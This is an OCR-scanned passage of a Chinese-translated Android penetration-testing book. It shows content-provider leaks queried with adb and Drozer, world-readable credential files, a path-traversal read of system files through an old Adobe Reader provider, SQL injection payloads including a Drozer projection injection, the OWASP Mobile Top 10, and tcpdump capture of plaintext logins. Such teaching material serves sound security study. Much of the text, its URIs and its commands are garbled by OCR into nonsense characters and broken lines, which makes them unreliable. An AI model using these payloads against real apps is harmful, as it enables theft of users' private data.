有 内 容 供 应 器 都 需要 在 AndroidManifest.xml 中 注册 。 因此 ， 我 们 可 以 对 应 用 程序 使 用 
Apktool， 并 通过 查看 AndroidManifest.xml 文件 检查 内 容 供 应 器 。 


定义 内 容 供 应 器 的 一 般 方 法 如 下 所 示 : 


<provider 
android:name="com.test.example.DataProvider" 
android:authorities ="com.test.example.DataProvider'"> 
</provider> 


所 以 现在 ， 我 们 将 举 一 个 漏洞 应 用 程序 的 例子 ， 并 尝试 利用 内 容 供应 器 泄漏 漏洞 : 


1. 为 了 反 编 译 应 用 程序 ， 我 们 将 使 用 Apktool 来 使 用 apktool d [appname].apk 反 编 译 应 用 
程序 。 


2. 为 了 找到 内 容 供 应 器 ， 我 们 可 以 简单 地 查看 定义 它们 的 AndroidManifest.xml 文件 ， 或 者 
我 们 可 以 使 用 一 个 简单 的 grep 命令 ， 从 应 用 程序 代码 中 获取 内 容 供应 器 ， 如 下 所 示 : 


android: name". NotePadProvider"” android: outhorities="con, threebonana. motes. provider .MotePad” /ss 





agPravider” android: authorities="com, threebonona, notes . provider. NotePodPending 


3. 我 们 可 以 使 用 grep 命令 来 查找 内 容 提 作 共 者 ， grep -R 'content://' ° 此 命令 将 在 每 
个 子 文件 夹 和 文件 中 查找 内 容 供应 器 ， 并 将 其 返回 给 我 们 。 


[本 

国 4ed ia. amali: const-string vO, “content: // tom, thresbanana. notes. provider NotePad/media“ 

»/MotePad iMedia. smali: const=<string vů, “content; //com, thresbanana, notes. provider,NotePad/media_api_id* 

./MotePadtMed ia. ona Li: const-string v8, “content: //com, threebanana, notes, provider. NotePad/media_silent_delete" 

»fotehadtedia, sma Li: const-string v8, “content: ) tom, thresbanans, notes. provider, NotePad/parent_note_of_media™ 

-/MatePadt4ed ia. shali: const=-string vů, “content: //com, threcbanana. notes. provider,NotePad/sedia_with_owmer" 

./MotePadtMedia. oma li: const-string v8, "cowhert: //com, thresbanana, notes. provider. NotePad/ images for_note™ 

.MatePad Med laNotes . gnali: comst-striing vě, “content: / (com, threebanana, notes. provider,NotePad/media_notes" 

.fMotePadthotes,. oma li: const-string v8, “content: //com. threepanana, notes. provider.NotePad/stopnotes” 

./MotePadthotes. onali: const-string vů, “content, //com, threebonans, notes. provider. NotePad/notes™ 

o/MotePadtNotes. smali: const=-string vů, “content)//com, thresbanans, notes. provider, NotePad/notes_show_de leted" 

./MetePadthotes. ona li: const-string vO, “content: //com, threebanana, notes. provider.NotePad/notes_si lent” 

»atePadShotes.. sma Li: tonst-string v8, “content: / com, threebanans. notes.provider.NotePad/notes_silent_delete” 

-/MatePadthotes.smali: comst=string vů, “content: /eo threebanans. notes. provider.ANotePad/notes_nodeld™ 

_/MotePadthotes. ama li: const-string v8, “content: //com, threebanana, notes. provider. NotePad/notes_nodeid silent" 

»MMotePadgnates. sma Li: const-string vě, “content: //com, threebanana, notes. provider.NotePad/notes_nodeid_ silent_delete" 

JMotePadthotes. smali: const-string v8, “content:// com, threebanana, notes. provider.NotePad/notes_with_images" 

_/MotePadtiotes. ona li: const-stering vO, “content: // com, threebanana, notes. provider. NotePad/add_ media for_note™ 

»MMotePadfiotes, smali: const-string v8, “contents // com, threepanana, notes. provider.NotePad/add_media_for_rote_silent™ 

fMotePad.smali:. field public static final SCHEME: Ljava/slang/String; = “contenti / 

notepad, dma lit const—string v8, “comtant: (Cos, Circehendns .nStes. provider Mater ad wipe” 

»/MoatePadPendingiMotes. sma li: const-string v@, “content com, threehanana. notes, provider .MotePadPending/notes" 

7 MatePadPendingiates, smali: const- string ve, "opatanti//goa. threebanana. nates. provider. MotePadPending/notes_nodeld 
wdi ing ve, “content: tom threebanana. totes. provider .MotePadPending/ _ Ea 


4. 现在， 我 们 在 模拟 器 中 安装 应 用 程序 。 为 了 查询 内 容 供应 器 并 确认 漏洞 是 可 利用 的 ， 我 
们 需要 在 Android 设备 或 模拟 器 中 安装 该 应 用 程序 。 使 用 以 下 代码 ， 我 们 将 在 设备 上 安 
RA LIN HAY app.apk 文件 : 





$ adb install vulnerable-app.apk 
1869 KB/s (603050 bytes in 0.315s) 

pkg: /data/local/tmp/vulnerable-app.apk 
Success 


5 我 们 可 以 通过 创建 另 一 个 没有 任何 权限 的 应 用 程序 来 查询 内 容 供应 器 ， 然 后 查询 漏洞 应 
用 程序 的 内 容 供 应 器 。 为 了 快速 获得 信息 ， 我 们 还 可 以 使 用 adb 查询 内 容 供 应 器 ， 我 们 
可 以 在 以 下 命令 中 看 到 : 


adb shell content query - - uri [URI of the content provider | 


以 下 是 在 汤 洞 应 用 程序 上 运行 的 命令 ， 输 出 展示 了 存储 在 应 用 程序 中 的 注释 


$ pdb shell content query --uri content://com. threebanana, notes. provider NotePad/notes 
low: @ reminder=@, hashcodes=, child_count=@, altitude=@.68, sharekey=@, source_url=NULL, nodeid=e-1, times 
tampe—9S4447201, idel, created=-954447201, longitude=@.8, parent_nodeide-1, api_pending opel, parent_id= 


=]; accuracy_altitudes#.6, publicURL=, texteThis is ð secret note, speed=$§.8, labels=, photos, photo_revi 
sione@, depthe@, display_ordere@, shareRL=, accuracy_position=@.6, server_sodified_ate®, source=sMWULL, ow 
ner_ide=-1, owner=sMe, bearing=8.6, latitude=@.6, note_mode=, photo_thumb=NULL, short_text=, photo_src= 





在 这 里 ， 我 们 还 可 以 使 用 MWR 实验 室 的 太一 个 名 为 Drozer 的 工具 ， 以 便 在 Android 应 
用 程序 中 找到 港 漏 的 内 容 供 应 器 漏洞。 我 们 可 以 从 官方 网 
站 https://labs.mwrinfosecurity.com/tools/drozer/ 下 载 并 安装 Drozer ° 


6. 一 旦 我 们 安装 了 它 ， 我 们 需要 将 代理 组 件 agent.apk 安装 到 我 们 的 模拟 路 ， 它 位 于 下 载 
ee e a a Leek 我 们 还 需要 在 每 次 启动 模拟 器 
时 转发 一 个 特定 的 端口 ( 31415 ) ， 以 便 建 立 连接 。 要 在 Mac 和 其 他 类 似 平台 上 安装 设 


备 ， 我 们 可 以 按 
照 https://www.mwrinfosecurity.com/system/assets/559/original/mwri_drozer-users-guide_z 


上 提供 的 在 线 指南 。 


adityagupta at Mathé Volumes/Aditya/drozer-2Z.3.2 
$ adb install agent.apk 
1518 KB/s (588116 bytes in 9.378s) 

pkg: /data/local/tmp/agent.apk 


Success 
adityagupta at MathBook Pro in /Volumes/Aditya/drozer- 
$ adb forward tcp:31415 tcp:31415 





7. 一 旦 完成 ， 我 们 可 以 启动 应 用 程序 ， 并 单 击 "Embedded Server (HRAAIRFA) "文本 。 
从 那里 ， 我 们 需要 回 到 设备 ， 尼 动 Drozer 应 用 程序 ， 并 通过 单 击 名 为 Disabled 的 左上 
角 切 换 按 钮 启用 服务 器 。 


drozer Server 


Server Details 
Gums SoS) Enabled 
Gum Password Protected 
$ Enabled 
Connected 
Active Sessions 


Messages 
| Starting Server... 
| Attempting to bind to port 31415... 
| Waiting for connections... 





8， 此 后 ， 我 们 需要 访问 终端 并 启动 Drozer， 并 将 其 连接 到 模拟 器 /设备 。 为 此 ， 我 们 需要 输 
A drozer console connect ， 如 下 面 的 截图 所 示 : 


$ drozer console connect 
Selecting 49d936a45d38a293 (Genymotion Nexus 4 4.3) 


9. 在 这 里 ， 我 们 可 以 运行 app.provider.finduri 模块 来 查找 所 有 内 容 供 应 器 ， 如 下 所 示 : 


dz> run app.provider.finduri com.threebanana.notes 

Scanning com.threebanana.notes... 
content://com.threebanana.notes.provider .NotePad/notes 
content://com.threebanana.notes.provider .NotePadPending/notes/ 
content://com.threebanana.notes.provider .NotePad/media 
content://com.threebanana.notes.provider .NotePad/topnotes/ 
content://com.threebanana.notes.provider .NotePad/media_with_owner/ 
content://com.threebanana.notes.provider .NotePad/add_media_for_note 
content://com.threebanana.notes.provider .NotePad/notes_show_deleted 
content://com.threebanana.notes.provider .NotePad/notes_with_images/ 


10. 一 旦 我 们 有 了 URI， 我 们 现在 可 以 使 用 Drozer 应 用 程序 查询 它 。 为 了 查询 它 ， 我 们 需要 
运行 app.provider.query 模块 并 指定 内 容 供应 器 的 URI， 如 下 面 的 截图 所 示 : 


二 
reminder 6 
hashcodes 
child_cownt 
altitude 
sharekey 
source_url null 
nmodeid = 
timestamp 1386319989407 
_id 1 
created 1386319989407 
longitude 8 
parent _nodeid 
Bp pending op 
parent_id 
accuracy_altitude 
publicURL 
text This is a secret note 





如 果 Drozer 能 够 查询 和 显示 来 自 内 容 供 应 器 的 数据 ， 这 意味 着 内 容 供应 器 泄漏 数据 并 且 
存在 漏洞 ， 因 为 Drozer 没有 被 明确 地 授予 使 用 数据 集 的 任何 权限 。 


11. 为 了 修复 此 漏洞 ， 开 发 人 员 需 要 做 的 是 ， 在 创建 内 容 供应 器 时 指定 参 
数 android:exported = false ， 或 者 创建 一 些 新 的 权限 á 另 一 个 应 用 程序 在 访 问 供 应 BL 


3.5 不 安全 的 文件 存储 


通 第 ， 开 发 人 员 为 应 用 程序 存储 数据 时 ， 未 指定 文件 的 正确 文件 权限 。 这些 文 件 有 时 被 标记 
为 全 局 可 读 ， 并 且 可 以 由 任何 其 它 应 用 程序 访问 而 不 需要 请 求 权限 。 


为 了 检查 这 个 漏洞 ， 我 们 所 需要 做 的 是 访问 adb shell ， 之 后 使 用 cd 进 
入 /data/data/[package name of the app] ° 


如 果 我 们 在 这 里 执行 一 个 简单 的 ls -1 ， 就 可 以 看 到 文件 和 文件 夹 的 文件 权限 : 


# ls -1 /data/data/com.aditya.example/files/userinfo. xml 
-rw-rw-rw- app_200 app_200 22034 2013-11-07 00:01 userinfo. xml 


这 里 我 们 可 以 使 用 find 来 搜索 权限 。 


find /data/data/ -perm [permissions value] 


如 果 我 们 执行 cat userinfo.xml ， 它 储存 了 应 用 的 用 户 的 用 户 名 和 和 密码。 


#grep 'password' /data/data/com.aditya.example/files/userinfo. xml 
<password>mysecretpassword</password> 


这 意味 着 任何 其 他 应 用 程序 也 可 以 查看 和 祖 取 用 户 的 机 禹 登录 凭据 。 可 以 通过 在 开发 应 用 程 
序 时 指定 正确 的 文件 权限 ， 以 及 一 起 计算 密码 与 盐 的 散 列 来 避免 此 漏洞 。 


目录 遍历 或 本 地 文件 包含 漏洞 


顾名思义 ， 应 用 程序 中 的 路 径 遍 历 漏洞 允许 攻击 者 使 用 漏洞 应 用 程序 的 供应 器 读 取 其 他 系统 
文件 。 


此 漏洞 也 可 以 使 用 我 们 之 前 讨论 的 工具 Drozer 进行 检查 。 在 这 里 ， 我 们 用 例子 来 说 明 由 
Seafastian Guerrero 发 现 的 Adobe Reader Android 应 用 程序 漏洞 

( http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-adobe-reader-android-ap 
) 。 此 漏洞 存在 于 Adobe Reader 10.3.1 中 ， 并 在 以 后 的 版 本 中 进行 了 修补 。 你 可 以 
从 http://androiddrawer.com 下 载 各 种 Android 应 用 程序 的 旧版 本 。 


我 们 将 启动 Drozer， 并 运行 app.provider.finduri RI $ ER N RIE E Z URI ° 


dz> run app.provider.finduri com.adobe.reader 
Scanning com.adobe.reader... 
content://com.adobe.reader.fileprovider/ 
content://com.adobe.reader.fileprov 


一 旦 我 们 找到 了 URI， 我 们 现在 可 以 使 用 app.provider.read 4 RHF] A AA XA ASA o 
在 这 里 ， 我 尝试 从 系统 中 读 取 一 些 文件 ， 如 /etc/hosts 和 /proc/cpuinfo ? 它们 默认 存在 于 
所 有 的 Android 实例 中 ， 因 为 它 是 基于 Linux 的 文件 系统 。 


dz> run app.provider.read content://com.adobe.reader.fileprovider/../../../../etc/host 


S 
127.0.0.1 localhost 


正如 我 们 在 下 面 的 屏幕 截图 中 看 到 的 ， 我 们 已 经 成 功 地 使 用 Adobe Reader 漏洞 内 容 供 应 器 
读 取 了 Android 文件 系统 中 的 文件 。 


z= run app- 机 [| eprovider/../. BE EN ./proc/cpouinta 
processor 


; GenuineIntel 

+ 6 

i 42 

+: Intel(R) Core(TH) i5-2435M CPU @ 2.40GHz 
ws 7 


z 2465. 663 
+: 6144 KB 
z: ne 

+ no 

: no 

i ne 

: yes 

i yes 


i yes 
fpu vme de pse tsc msr pae mce cxB apic sep mtrr pge mca cmov pat pse36 clflush mmx 
rdtscp im ma tsc up pri monitor asse3 lahf_le 
togomips : 4931.32 
clflush size : 64 
ache_alignment : 64 
address sizes : 36 bits physical, 48 bits virtual 





客户 端 攻 击 通常 发 生 在 应 用 程序 未 检查 用 户 输 入 的 时 候 。 例 如， 在 对 SQLite 数据 库 的 查询 期 
间 ， 应 用 程序 正在 解析 用 户 输入 ， 因 为 它 位 于 查询 语 名 中 。 


让 我 们 举 一 个 应 用 程序 的 示例 ， 它 检查 本 地 SQLite 数据 库 ， 来 根据 登录 凭据 验证 用 户 。 
比 ， 当 用 户 提供 用 户 名 和 考 码 时 ， 正 在 运行 的 查询 将 如 下 所 示 : 


SELECT * FROM 'users' where username='user-input-username' and password='user-input-pa 
ssword' 


现在 ， 在 正常 情况 下 ， 这 将 正常 工作 ， 用 户 输 入 其 卜 正 的 登录 和 凭据， 并 且 查 询 取 决 于 条 件 将 
返回 true 或 false ° 


SELECT * FROM 'users' where username='aditya' and password='mysecretpass 


但 是 ， 如 果 攻 击 者 输入 SQL 语句 而 不 是 正常 的 用 户 名 怎么 办 ?请 参考 以 下 代码 : 


SELECT * FROM 'users' where username='1' or 1 = '1' - - and password='mysecretpasswo 
rd 


eee T 即使 用 户 不 知道 用 户 名 和 敌 码 ， 人 他们 可 以 通过 使 用 1'0r'1'='1 查询 来 
寸 它 ， 这 在 所 有 情况 下 都 返回 true 。 因此 ， 应 用 程序 开发 人 员 必 须 在 应 用 程序 中 进 
检查 ， 来 检查 用 户 输 入 。 


PN 
水 
SS 


TE AR 
我 们 还 可 以 使 用 Drozer 的 app.provider.query 来 利用 SQL 注入 漏洞 。 其 语法 看 起 来 像 : 


run app.provider.query [Content Provider URI] --projection "* FROM SQLITE_MASTER WHER 
E type='table';- -" 


现在 ， 这 将 返回 SQLite 数据 库 中 整个 表 的 列表 ， 它 的 信息 存储 在 SQLITE_MASTER Po 您 还 可 
以 继续 并 执行 更 多 的 SQL 查询 ， 来 从 应 用 程序 提取 更 多 的 信息 。 为 了 使 用 Drozer 实战 漏洞 
利用 ， 你 可 以 从 https://www.mwrinfosecurity.com/products/drozer/community-edition/ 下 载 他 
们 的 漏洞 应 用 程序 。 


3.6 OWASP 移动 Top10 


Web 应 用 程序 开放 安全 项 目 (OWASP) 是 涉及 安全 和 漏洞 搜索 的 标准 之 一 。 它 还 发 布 了 前 
10 名 漏洞 的 列表 ， 其 中 包括 在 各 种 平台 中 最 常见 和 重要 的 漏洞 。 


可 以 
在 https://www.owasp.org/index.php/Projects/OWASP_Mobile Security_Project_-_Top_Ten_Mobile_ 
上 找到 OWASP 移动 版 的 前 10 个 指南 。 如 果 我 们 查看 OWASP 移动 项 目 ， 以 下 是 它 涵盖 的 
移动 应 用 程序 的 10 个 安全 问题 : 


o 服务 端 弱 控 制 

© 不 安全 的 数据 存储 

e 传输 层 保护 不 足 

o 意外 的 数据 泄漏 

o 缺少 授权 和 认 十 

© Ah IS 

© 客户 端 注入 

。 通过 不 可 信和 输入 的 安全 决策 
o 不 正确 的 会 话 处 理 

。 缺乏 二 进 制 保护 


让 我 们 乏 一 介绍 它们 ， 并 快速 了 解 它 们 在 移动 应 用 程序 中 的 关系 ， 以 及 我 们 如 何 检测 它们 : 


及 务 端 弱 控 制 


第 一 个 OWASP 漏洞 是 服务 端 弱 控制 ， 顾 名 思 义 ， 服 务 端 不 以 安全 的 方式 将 数据 从 移动 应 用 

程序 发 送 到 服务 端 ， 或 者 在 发 送 数 据 时 暴露 一 些 敏 感 的 APl。 例 如 ， 考 虑 一 个 Android 应 用 

程序 发 送 登 录 凭 据 到 服务 器 进行 身份 验证 ， 而 不 验证 输入 。 攻击 者 可 以 以 这 样 的 方式 修改 赁 

证 ， 以 便 访问 服务 器 的 敏感 或 未 授权 区 域 。 此 汤 洞 可 视 为 移动 应 用 程序 和 Web 应 用 程序 中 的 
一 个 漏洞 。 


不 安全 的 数据 和 存储 


这 仅仅 意味 着 ， 应 用 相关 信息 以 用 户 可 访问 的 方式 在 设备 上 存储 。 许多 Android 应 用 程序 在 
共享 首选 项 ，SQLite ( 纯 文本 格式 ) 或 外 部 存储 器 中 ， 存 储 与 用 户 相关 的 私密 信息 或 应 用 程 
序 信息 。 开 发 人 员 应 该 始终 记 住 ， 即 使 应 用 程序 在 数据 文件 夹 ( /data/data/package-name ) 


中 存储 敏感 信息 ， 只 要 手机 已 root， 和 恶意 应 用 程序 /攻击 者 就 可 以 访问 它 


传输 层 保 护 不 足 


许多 Android 开发 人 员 依 赖 于 通过 不 安全 模式 的 网 络 来 发 送 数 据 ， 例 如 HTTP 或 没有 正确 实 
现 SSL 的 形式 。 这 使 得 应 用 程序 易 受 到 网 络 上 发 生 的 所 有 不 同类 型 的 攻击 ， 例 如 流量 拦截 ， 
从 应 用 程序 向 服务 器 发 送 数据 时 操纵 参数 ， 以 及 修改 响应 来 访问 应 用 程序 的 锁定 区 域 。 


意外 的 数据 泄漏 


当 应 用 程序 将 数据 存储 在 本 身 易 受 攻 击 的 位 置 时 ， 会 出 现 此 漏洞 。 这 些 可 能 包括 剪贴 板 ， 
URL 缓存 ， 浏 览 器 Cookie，HTML5 patastorage ， 统 计数 据 等 。 一 个 例子 是 用 户 登 录 到 他 
ee Pe ， 他 们 的 密码 已 经 复制 到 剪贴 板 。 现 在 ， 即 使 是 恶意 应 用 程序 也 可 以 访问 
用 户 剪贴 板 中 的 数据 。 


缺少 授权 和 认证 


如 果 Android 应 用 程序 或 一 般 的 移动 应 用 程序 在 没有 适当 安全 措施 的 情况 下 ， 尝 试 基 于 客户 
ee ee ee ot eat ee 
root， 大 多 数 客 户 端 保护 可 以 被 攻击 者 绕 因此 ， 建 议 应 用 程序 开发 人 员 使 用 服务 器 端 身 
份 验证 和 授权 进行 适当 的 检查 ， upepo ， 请 使 用 随机 生成 的 令 牌 ， 以 便 在 移动 设备 上 
验证 用 户 。 


T BL AY Fra 


TK ALA FR TAL AREY BH A HBR Hoo BH AE SB Yo 这 可 能 包括 一 些 已 知 和 存在 漏洞 的 萌 法 ， 
如 MD5，SHA1，RC2， 甚 至 是 没有 适当 的 安全 措施 的 定制 萌 法 。 


RP RIEA 
这 在 Android 应 用 程序 中 是 可 行 的 ， 主 要 成 因 是 使 用 SQLite 进行 数据 存储 。 我们 将 在 本 书 的 
各 章 中 执行 注入 攻击 。 

过 不 可 信 输 入 的 安全 决策 


在 移动 应 用 程序 中 ， 开 发 人 员 应 始终 过 滤 和 验证 用 户 提供 的 输入 或 其 他 相关 输入 ， 并 且 不 应 
该 像 在 应 用 程序 中 那样 使 用 它们 。 不 受信 任 的 输入 通常 会 导致 应 用 程序 中 的 其 他 安全 风险 ， 
如 客户 端 注 入 。 


不 正确 的 会 话 处 理 


在 为 移动 应 用 程序 执行 会 话 处 理 时 ， 开 发 人 员 需 要 处 理 很 多 因素 ， 例 如 认证 cookie 的 正常 过 
期 ， 安 全 令 牌 创建 ，cookie 生成 和 轮换 ， 以 及 无 法 使 后 端的 会 话 无 效 。 必须 在 Web 应 用 程 
序 和 Android 应 用 程序 之 间 维 护 正确 的 安全 同步 。 


缺乏 二 进 制 保护 


这 意味 着 不 能 正确 地 防止 应 用 程序 被 逆向 或 反 编译 。 诸 如 Apktool 和 dex2jar 之 类 的 工具 可 
用 于 逆向 Android 应 用 程序 ， 如 果 没 有 遵循 正确 的 开发 实践 ， 它 会 暴露 应 用 程序 的 各 种 安全 
风险 。 为 了 防止 通过 逆向 攻击 来 分 析 应 用 程序 ， 开 发 人 员 可 以 使 用 ProGuard 和 Dasho 等 工 


在 本 章 中 ， 我 们 学 习 了 使 用 各 种 方法 来 逆转 Android 应 用 程序 并 分 析 源 代码 。 我 们 还 学 习 了 
如 何 修改 源 代 码 ， 然 后 重新 编译 应 用 程序 ， 来 绕 过 茶 些 保护 。 此 外 ， 我 们 还 看 到 了 如 何 使 用 
Drozer 等 工具 寻找 Android 应 用 程序 中 的 漏洞 。 你 还 可 以 通 

过 http://labs.securitycompass.com/exploit-me/ * H #7 Exploit-Me 实验 室 中 的 各 种 漏洞 ， 
它 由 Security Compass 开发 。 

在 下 一 章 中 ， 我 们 将 进一步 尝试 Android 应 用 程序 的 流量 拦截 ， 并 在 我 们 的 渗透 测试 中 使 用 
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第 四 草 对 Android 设备 进行 流量 分 析 
作者 : Aditya Gupta 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


在 本 章 中 ， 我 们 将 研究 Android 设备 的 网 络 流量 ， 并 分 析 平 台 和 应 用 程序 的 流量 数据 。 通常 
应 用 程序 会 在 其 网 台 ee en 最 重要 的 任务 之 一 。 
此 外 ， 你 经 常会 遇 到 通过 不 安全 的 网 络 协议 执行 身份 验证 和 会 话 管 理 的 应 用 程序 。 因此， 在 
本 章 中 ， 我 们 将 学 习 如 何 拦截 和 分 析 Android 设备 中 ， 各 种 应 用 程序 的 流量 。 


4.1 Android 流量 拦截 


根据 OWASP 移动 
Top10 ( https://www.owasp.org/index.php/Projects/OWASP_Mobile SSS ee Te 
) ， 不 完善 的 传输 层 保 护 是 第 三 大 威胁 。 实 际 上 ， 假 设 一 个 应 用 程序 通过 HTTP 将 用 户 的 登 
交 到 服务 器 。 如 果 用 户 位 于 咖啡 店 或 机 场 ， 并 在 有 人 噢 探 网 络 J 用 程 
Fe? Z AF“ ee 的 整个 登录 凭据， 它 以 后 可 能 用 于 恶意 目的 。 假设 
应 man 序 正在 通 过 HTTPS 进行 身份 验证 ， 通 过 HTTP 的 会 话 管理 ， 并 且 在 请 求 中 传递 身份 
全 证 Cookies 在 这 种 情况 下 ， 攻 击 者 也 能 够 通过 在 执行 中 间 人 攻击 时 拦截 网 络 来 获取 身份 验 
证 Cookie。 使 用 这 些 认证 cookie， 他 可 以 直接 作为 受害 用 户 登 录 到 应 用 程 序 。 


4.2 流量 分 析 方 式 


在 任何 情况 下 都 有 两 种 不 同 的 流量 捕获 和 分 析 方 法 。 我 们 将 研究 Android 环境 中 可 能 的 两 种 
不 同类 型 ， 以 及 如 何在 扣 实 场景 中 执行 它们 。 被 动 和 主动 分 析 如 下 


© 被 动 分 析 : 这 是 一 种 流量 分 析 的 方法 ， 其 中 应 用 程序 发 送 的 网 络 数 据 不 会 被 拦截 。 相 
反 ， 我 们 将 尝试 捕获 所 有 网 络 数据 包 ， 然 后 在 网 络 分 析 器 (如 Wireshark) 中 打开 它 ， 然 
后 尝试 找 出 应 用 程序 中 的 漏洞 或 安全 问题 。 
© 主动 分 析 : 在 主动 分 析 中 ， 渗 透 测试 者 将 主动 拦截 所 有 正在 进行 的 网 络 通 信 ， 并 可 以 即 
时 分 析 ， 评 估 和 修改 数据 。 这 里 ， 他 需要 设置 代理 ， 并 且 由 应 用 /设备 生成 和 接收 的 所 有 
网 络 流量 会 通过 该 代理 。 


被 动 分 析 


被 动 分 析 的 概念 是 。 将 所 有 网 络 信 息 保存 到 特定 文件 中 ， 之 后 使 用 数据 包 分 析 器 查看 。 这 就 
是 我 们 将 在 Android 设备 中 进行 被 动 分 析 。 我 们 将 使 用 tcpdump 来 将 所 有 的 信息 保存 到 设备 
中 一 个 位 置 。 此 后 ， 我 们 将 该 文件 拉 取 到 我 们 的 系统 ， 然 后 使 用 Wireshark 或 Cocoa 包 分 析 
器 查看 它 。 请 参阅 以 下 步骤 : 


1. 


我 们 从 Timur Alperovich 的 网 站 http://www.eecs.umich.edu/~timuralp/tcpdump-arm F R 
为 ARM 编译 的 tcpdump 二 进 制 文件 。 如 果 我 们 需要 ， 我 们 还 可 以 下 载 tcpdump 的 原始 
二 进 制 文件 并 交叉 编译 (A Android 交叉 编译 你 的 二 进 制 文件 ， 请 按照 链 

接 http://machi021.blogspot.jp/2011/03/compile-busybox-for-android.html ° 链接 展示 了 
交叉 编译 BusyBox， 但 相同 的 步骤 可 以 应 用 于 tcpdump ) ° 


一 旦 我 们 下 载 了 tcpdump ， 我 们 可 以 通过 在 我 们 刚刚 下 载 的 二 进 制 上 执行 一 个 文件 ， 来 
确认 它 是 否 为 ARM 编译 。 对 于 Windows 用 户 ， 你 可 以 使 用 Cygwin 来 执行 命令 。 输出 
类 似 于 以 下 屏幕 截图 中 所 示 : 


tile Tenhi arm 





tepdump—arm: ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, stripped 


这 里 的 下 一 步 是 将 tcpdump 二 进 制 文 件 推送 到 设备 中 的 一 个 位 置 。 我 们 还 必须 记 住 ， 我 
们 需要 继续 执行 这 个 文件 。 因此， 我们 将 它 推送 到 一 个 位 置 ， 我 们 可 以 从 中 更 改 权 限 ， 
以 及 执行 二 进 制 来 捕获 流量 。 


现在 ， 继 续 并 使 用 adb 的 push 命令 推送 二 进 制 来 将 二 进 制 推送 到 设备 。 同样 ， 在 我 们 
需要 从 设备 中 拉 取 内 容 的 情况 下 ， 我 们 可 以 使 用 pull 而 不 是 push ° 


这 里 ， 我 们 将 使 用 adb push 将 其 推送 到 Android 中 的 /data/local/tmp 


adb push tcpdump-arm /data/local/tmp/tcpdum 


一 旦 我 们 将 tcpdump 二 进 制 推送 到 设备 ， 然 后 需要 使 用 ado 在 shell 中 访问 设备 ， 并 更 改 
进 制 的 权限 。 如果 我 们 试图 运行 tcpdump ， 它 会 给 我 们 一 个 权限 错误 ， 因 为 我 们 没有 
执行 权限 。 


为 了 更 改 权 限 ， 我 们 需要 访 由] /data/local/tmp ° 使 用 chmod 命令 并 授予 其 权 
R 777 ， 这 意味 着 应 用 程序 将 具有 所 有 权限 。 以 下 屏幕 截图 显示 了 上 述 命令 的 结果 输 
出 : 


# chmod 777 tcpdump 





# ls -l 
-rwxrwxrwx root root 1801145 2012-10-17 20:19 tcpdump 
这 里 的 最 后 一 FEH 动 tcpdump 并 将 输出 写 .pcap 文件 。 使 用 -s > -v 和 -w 标志 上 局 


动 tcpdump ° APR coy 


o -S : 这 表示 从 每 个 封包 抽取 给 定 (在 我 们 的 例子 中 为 0) 字 节 的 数据 ， 而 不 是 默认 的 
65535 F% 


o -y :这 表明 详细 输出 。 

o -W :这 表明 写 入 原始 数据 包 的 文件 名 。 例如， 我 们 可 以 使 
用 ./tcpdump -v -s © -w output.pcap ? 以 便 将 所 有 文件 写 入 output.pcap ?’ 并 输出 
详细 信息 。 


T. 在 流量 捕获 执行 期 Jal ， 打开 手机 浏 E a FP 1 问 位 于 http://attify.com/data/login.html 的 


10. 


11. 


漏洞 登录 表单 ， 该 表单 通过 HTTP 发 送 所 有 数据 并 使 用 GET 请 求 : 








| © attify.com 


Member Login 


Username : android 


Password ` TT 


kæ = 一 一 -一 一 于 一 -二 一 号 一 一 


Login 





这 里 使 用 用 户 名 android 47 44 mysecretpassword 登录 应 用 程序。 


我 们 现在 可 以 在 任何 时 候 通过 adb shell 服务 终止 进程 (使 用 ctrl +c ) 。 下 一 步 是 将 
捕获 的 信息 从 设备 拉 取 到 我 们 的 系统 。 为 此 ， 我 们 将 简单 地 使 用 adb pull 如 下 : 


adb pull /data/local/tmp/output.pcap output.pcap 


可 能 还 需要 更 改 output.pcap 的 权限 才能 拉 取 它 。 在 这 种 情况 下 ， 只 需 执 行 以 下 命 


A> zX 


chmod 666 output.pcap 


一 旦 我 们 下 载 了 捕获 的 网 络 数据 的 .pcap 文 件 ， 我 们 可 以 在 Wireshark 中 打开 它 并 分 析 流 
To 在 这 里 ， 我 们 将 尝试 查找 捕获 的 登录 请 求 。 我 们 可 以 从 网 

站 http://www.wireshark.org/download.html FR Wireshark 。 一旦 下 载 并 安装 完毕 ， 打 
开 Wireshark 并 在 里 面 打 开 我 们 新 拉 取 的 文件 output.pcap ， 通 过 访问 File | Open ° 


一 旦 我 们 在 Wireshark 中 打开 .pcap 文件 ， 我 们 会 注意 到 一 个 类 似 下 面 截图 所 示 的 屏 
幕 : 


第 四 章 对 Android 设备 进行 流量 分 析 
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Wireshark 是 一 个 开源 封包 分 析 器 ， 它 帮助 我 们 发 现 敏 感 信 息 ， 并 分 析 来 自 所 有 网 络 连 接 
的 流量 数据 。 在 这 里 ， 我 们 正在 搜索 我 们 对 http://attify.com 所 做 的 请 求 ， 并 输入 了 我 
们 的 登录 凭据 。 


12. 现在， 访问 edit 并 单 击 Find Packets ° 在 这 里 ， 我 们 需要 查找 我 们 提交 登录 凭据 的 网 
站 ， 并 检查 string ° 


String Options Direction 
© Packet list O0 Case sensitive O Up 
® Packet details Character set: ® Down 
O Packet bytes | ASCII Unicode & Non-Unicode ~ | 


X Cancel | -Find 


13. 在 这 里 ， 我 们 可 以 看 到 与 http://attify.com/data/login.html 的 连接 。 如 果 我 们 在 底部 
窗 格 中 查找 有 关 此 数据 包 的 更 多 信息 ， 我 们 可 以 看 到 包含 我 们 输入 的 用 户 名 和 密码 的 请 
RA bE © 





Host: attify. comi ryn 
Accept-Encoding: gzip\r\n 


Referer: http: /fattify.com/data/ login. html rn 

Accept: Language: en-US\r\n 

User-Agent: Mozillas5.@ (Linus; U; Android 2.3.3; en-us; sdk Build/GRI34) AppleWebKit/533.1 (KHTHL, Like G 
eat Sep eatin pi text/html; g=0.9, text/plain; g=0.8, image/png, */*;q=0. 54r\n 





因此 ， 我 们 使 用 tcpdump 成 功 捕获 了 网 络 数据 ， 并 将 其 存储 在 .pcap 文件 中 ， 然 后 使 用 
Wireshark 进行 分 析 。 然而 ， 被 动 流量 捕获 也 可 以 通过 adb shell 直接 完成 。 


45 


adb shell /data/local/tmp/tcpdump -i any -p -s © -w /mnt/sdcard/output.pcap 


